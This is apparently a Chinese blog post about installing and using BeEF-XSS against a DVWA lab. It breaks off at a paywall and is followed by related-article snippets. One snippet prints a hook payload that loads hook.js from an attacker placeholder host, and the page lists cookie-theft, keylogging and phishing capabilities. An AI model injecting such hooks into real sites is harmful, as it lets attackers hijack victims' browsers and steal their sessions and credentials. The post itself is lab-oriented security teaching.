一个好玩的工具BeEF介绍

最新推荐文章于 2024-08-21 13:48:19 发布
最新推荐文章于 2024-08-21 13:48:19 发布
阅读量1.8k 收藏 6
点赞数 2
分类专栏: web安全学习之路 文章标签: 安全 web 信息安全 github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luluoluoa/article/details/116504333
版权
本文介绍了BeEF-XSS,一个强大的Web框架攻击平台,用于利用XSS漏洞。通过在Kail虚拟机上安装并设置,然后在浏览器中打开,可以收集浏览器信息、键盘记录等。BeEF的使用包括在存在XSS漏洞的网站上放置钩子代码,一旦受害者访问,攻击者就能获取详细信息并发送命令。
摘要由CSDN通过智能技术生成

beef

BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能
BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等

总之就是使用beef这个工具来利用xss漏洞的

beef安装

我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆,登陆名beef,密码就是安装时设置的那个

beef打开

在终端输入命令beef-xss就可以使用beef了

在浏览器输入http://127.0.0.1:3000/ui/panel,输入登录名密码就可以打开beef,此时什么都没有

beef使用

首先需要一个存在xss漏洞的网站,我这里用的dvwa,在dvwa的xss-store就存在xss漏洞,记得难度设置为low。

找到xss漏洞点,我们就开始利用了。

beef利用漏洞是使用叫“钩子的js代码”,就是在xss漏洞的输入框输入<script src="ht

最低0.47元/天 解锁文章
kali-beef工具(xss-stored)
Vincent0sen的博客
09-06 529
kali工具beef-xss
kali漏洞利用之BeeF
The__Apollo的博客
04-22 5856
对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。打开beefbeef-xss 默认用户名和密码分别为beef/beef 假设被测试主机由于XSS漏洞请求到下面这个页面 这时候可以看到,online browsers就多了一项127.0.0.1
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1283
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
最新发布
dzqxwzoe的博客
08-21 1016
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4291
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
webwell安全工具-BeEF
凯歌响起的博客
09-05 1974
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。​ BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。
XSS漏洞利用工具BeEF
RockHan
11-06 803
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
Beef工具使用
热门推荐
wo41ge的博客
02-22 1万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1549
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
本文档介绍了一种常用的渗透测试工具——Beef,以及如何利用它对客户端浏览器进行劫持。 Beef(Browser Exploitation Framework)是一个基于Web的渗透测试框架,专门设计用于安全研究人员和渗透测试人员控制和操纵...
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
web15085181368的博客
03-06 672
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 模块颜色及解释 回顾
vasp.5.4.4&beef-src.tar.xz
03-20
beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年做出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software...
XSS自动化工具——Beef
世间繁华梦一出
03-10 5611
Beef的使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7627
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
XSS 工具beef
weixin_47306547的博客
09-25 795
beef介绍 XSS 漏洞的利用平台,kali 自带 beef 的启动 Kali 中 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 工具的方法 1)beef-xss 2) /usr/share/beef-xss/beef 注:在启动前需要修改默认用户...
kali工具Beef
m0_65129142的博客
12-22 893
简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.中间人 社会工程: 1.点击劫持 2.弹窗告警 3.虚假页面 4.钓鱼页面 渗透攻击: 1.内网渗透
神器 | kali工具Beef
南迪叶先森
07-06 1079
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 声明:本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 http://beefproject.com 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4..
Beef安装与简单使用
abg49988的博客
11-06 2109
安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值